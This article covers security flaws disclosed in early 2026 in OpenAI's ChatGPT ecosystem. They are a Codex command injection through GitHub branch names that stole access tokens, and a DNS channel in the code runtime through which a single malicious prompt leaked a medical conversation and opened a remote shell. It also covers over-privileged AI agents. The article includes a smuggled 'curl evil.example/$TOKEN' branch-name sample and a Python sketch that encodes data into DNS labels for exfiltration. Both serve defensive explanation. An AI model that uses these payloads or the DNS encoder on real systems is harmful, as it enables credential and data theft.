The Trust Problem: ChatGPT's Security Failures and What They Mean for Everyone Using It
A developer in a shared codebase runs a routine task. Somewhere in that repository sits a branch with an unremarkable name. The name is not what it appears to be. Invisible Unicode characters conceal a shell command inside it. The moment the AI coding agent processes the branch, it executes the payload, harvests the developer's GitHub authentication token, and forwards it silently to a server the developer has never heard of. No alert. No warning. The token is already gone.
This is not a hypothetical. It is one of three major security failures involving OpenAI's ChatGPT ecosystem that researchers brought to light in early 2026. A critical command injection flaw in the Codex coding agent enabled the theft of GitHub credentials at scale. A hidden DNS-based channel within ChatGPT's code execution runtime could exfiltrate conversation data and uploaded files without any warning to the user. And underpinning both technical findings is a broader governance failure: enterprises are deploying AI agents with privileges far exceeding what those agents need, with little visibility into what they are actually doing. OpenAI has since patched both vulnerabilities, but the disclosures reveal how much of the security model around AI platforms rests on assumptions that do not hold.
A Branch Name That Became a Backdoor
OpenAI Codex is a cloud-based coding assistant built into ChatGPT. Developers connect GitHub repositories, issue prompts, and Codex spins up a managed container to execute tasks, authenticating with a GitHub OAuth token carrying read and write access to repositories, workflows, actions, and pull requests.
BeyondTrust Phantom Labs found that Codex failed to sanitise the GitHub branch name parameter during task creation. The parameter was passed directly into container setup scripts without validation, so an attacker could inject shell commands simply by naming a branch accordingly and harvest the agent's GitHub User Access Token. Tyler Jespersen, who led the investigation, explained:
"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token, the same token Codex uses to authenticate with GitHub."
Payloads were disguised using Unicode Ideographic Spaces, invisible characters making malicious branches appear identical to a standard main branch. The exploit was fully automatable across any shared repository, and desktop Codex applications also stored credentials in a local auth.json file, creating a second attack path.
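The defence Jespersen's team describes is straightforward input validation before any user-controlled string reaches a shell. The sketch below is illustrative, not OpenAI's actual remediation: it rejects branch names containing shell metacharacters or characters Unicode classifies as separators, format, or control characters, which catches the Ideographic Space (U+3000) used to disguise the payloads, then applies a conservative allow-list.

```python
import re
import unicodedata

# Shell metacharacters that should never appear in a branch name
# that will be interpolated into a setup script.
_SHELL_META = set(";&|$`<>(){}\n")

def is_safe_branch_name(name: str) -> bool:
    """Reject branch names that could smuggle a shell payload.

    Flags shell metacharacters and any character in the Unicode
    separator (Zs), format (Cf), or control (Cc) categories --
    including the invisible Ideographic Space, U+3000.
    """
    for ch in name:
        if ch in _SHELL_META:
            return False
        if unicodedata.category(ch) in ("Zs", "Cf", "Cc"):
            return False
    # Final allow-list: only characters commonly safe in git refs.
    return re.fullmatch(r"[A-Za-z0-9._/\-]+", name) is not None

# A branch that renders like "main" but hides a payload after an
# invisible Ideographic Space:
disguised = "main\u3000;curl evil.example/$TOKEN"
assert not is_safe_branch_name(disguised)
assert is_safe_branch_name("feature/login-fix")
```

Allow-listing is the important half: deny-lists of known-bad characters are exactly what invisible Unicode variants are designed to slip past.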
Fletcher Davis, Director of Research at BeyondTrust Phantom Labs, said: "AI coding agents like Codex are not just development tools, but privileged identities operating inside live execution environments with direct access to source code, credentials, and infrastructure. When user-controlled input is passed into these environments without strict validation, the result is not just a bug. It is a scalable attack path into enterprise systems." OpenAI classified the issue as Critical Priority 1 and confirmed full remediation by February 5, 2026.
The Conversation That Was Never Private
The same week, Check Point Research disclosed a separate vulnerability. ChatGPT's Python-based code execution runtime is described by OpenAI as a secure, isolated container that cannot make outbound network requests. Any data sharing through GPT Actions requires explicit user approval. Check Point found that DNS resolution, treated as routine infrastructure traffic, remained fully active inside the container.
By encoding conversation content into DNS subdomain labels, data could be transmitted outward through legitimate resolver infrastructure with no warning, no confirmation, and no recognition by the model that anything was leaving the platform at all. A single malicious prompt activated the channel; every subsequent message became a potential source of leakage. The channel was bidirectional: attackers could send commands back through DNS responses and establish a remote shell inside ChatGPT's Linux execution environment, operating entirely outside the model's safety checks.
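The mechanics of this kind of DNS tunnelling are simple to sketch. The snippet below is an illustration of the general technique Check Point described, not their proof of concept; the domain name is a placeholder. Data is hex-encoded and packed into subdomain labels (each capped at 63 characters by the DNS specification), so the lookup itself carries the payload to whoever runs the authoritative nameserver for the domain, with no HTTP request ever made.

```python
import binascii

MAX_LABEL = 63  # per-label limit imposed by DNS (RFC 1035)

def encode_for_dns(data: bytes, domain: str = "attacker.example") -> str:
    """Pack data into DNS subdomain labels under an attacker's domain.

    Resolving the returned hostname leaks `data` to the domain's
    authoritative nameserver through ordinary resolver infrastructure.
    """
    hexed = binascii.hexlify(data).decode()
    labels = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    return ".".join(labels + [domain])

name = encode_for_dns(b"patient: J. Doe")
# A plain lookup -- e.g. socket.gethostbyname(name) -- would complete
# the exfiltration; no outbound HTTP connection is needed.
```

This is why "the container cannot make outbound network requests" was a false assurance: blocking HTTP while leaving DNS resolution open leaves a fully functional, and as Check Point showed, bidirectional, covert channel.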
Check Point built a proof of concept using a GPT configured as a personal doctor. A user uploaded laboratory test results, described their symptoms, and received a normal-looking medical consultation. The patient's identity and full medical assessment were simultaneously being transmitted to an attacker-controlled server. When asked directly, ChatGPT confidently denied that any data had left the platform.
Eli Smadja, Head of Research at Check Point Research, was direct about the broader lesson: "This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default. As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organisations need independent visibility and layered protection between themselves and AI vendors." OpenAI deployed a fix on February 20, 2026.
Five Hundred Strangers in the Building
Mortada Ayad, Vice President of Sales at Delinea, uses a specific image to describe what AI governance looks like inside most enterprises today. You work in HR. You walk into the office and find 500 people you have never seen before: asking questions, picking up documents, moving through secure areas. Nobody knows who they are or what they are authorised to do. That, he says, is the reality of AI agents in organisations right now. He estimates the ratio of AI and machine identities to human identities inside enterprises now stands at 40 to 1. When he started in the industry, it was 4 or 5 to 1.
Ayad is direct about the geopolitical dimension: "AI is being used as a significant security breach. We cannot avoid it, we cannot ignore it. Attacks are not just happening on a physical front; they are happening on a very deep technological front. ChatGPT is being used, OpenAI is being used, Gemini is being used, and there are many reports coming out on how people are slowly using these to create and facilitate breaches." Generative AI has democratised offensive capabilities in ways with no recent precedent.
As he described it: "I can take AI today, and every morning it will tell me the top five topics I could exploit with spam or phishing, and it will build the entire toolkit for me, something different every day. That is why we saw scammers in the UAE using AI for air travel fraud on the very first day of the conflict. Awareness is the first protection, but we also have to use AI to protect ourselves."
The defensive answer is what Delinea calls zero standing privilege: AI agents should hold only the permissions they need, be accessible only under specific conditions, and have elevation granted only when circumstances explicitly warrant it. In practice, most organisations skip this entirely. Teams request agents, cannot define the exact permissions required, and default to administrative access. Ayad put it plainly: "We don't want to give any identity, human or AI, more permission than they actually need. When you put those guardrails in place, the blast radius of any incident is minimised. But when an AI agent is overprivileged and not secured, and something happens, the blast radius would be very big, and that would be treated as a major incident." The Codex exploit worked precisely because the agent held permissions it never needed. Tighter scoping would not have prevented the vulnerability, but it would have made the stolen credential far less valuable.
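In code terms, zero standing privilege means an agent's permissions are checked against a declared need at grant time rather than defaulting to administrative access. The sketch below is a minimal illustration of that idea, not Delinea's product or the GitHub scope model; the scope names are hypothetical.

```python
from dataclasses import dataclass, field

@dataclass
class AgentIdentity:
    """An AI agent treated as a governed, least-privilege identity."""
    name: str
    needed_scopes: frozenset   # declared up front, before deployment
    granted_scopes: set = field(default_factory=set)

    def grant(self, scope: str) -> None:
        # Refuse any grant outside the declared need -- the default
        # is denial, not administrative access.
        if scope not in self.needed_scopes:
            raise PermissionError(
                f"{self.name}: '{scope}' exceeds declared need"
            )
        self.granted_scopes.add(scope)

    def excess(self) -> set:
        """Standing privilege the agent holds but never declared."""
        return self.granted_scopes - self.needed_scopes

agent = AgentIdentity("codex", frozenset({"repo:read", "pr:write"}))
agent.grant("repo:read")        # within declared need: allowed
try:
    agent.grant("workflow:write")  # never declared: denied
except PermissionError:
    pass
```

Under a model like this, a stolen token carries only the scopes the agent could justify, which is exactly the blast-radius reduction Ayad describes.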
What Has Not Been Patched
Both vulnerabilities have been fixed. What remains are the conditions that allow them to persist undetected: the assumption that AI execution environments are isolated when they are not, excessive permissions granted to agents whose scope was never defined, and the absence of governance to catch anomalous behaviour before it becomes a breach. Davis was clear:
"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in and the input they consume must be treated with the same rigour as any other application security boundary. The attack surface is expanding." Jespersen added: "Treat agent containers as strict security boundaries, never trust external provider data formats as inherently safe, and audit AI application permissions to enforce strict least privilege."
Smadja's conclusion applied beyond any single platform: "As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organisations need independent visibility and layered protection between themselves and AI vendors." AI agents are not passive data stores. They hold real credentials, make autonomous decisions, and trigger cascading actions across production systems. Governing them as privileged identities is not a future consideration. It is already overdue.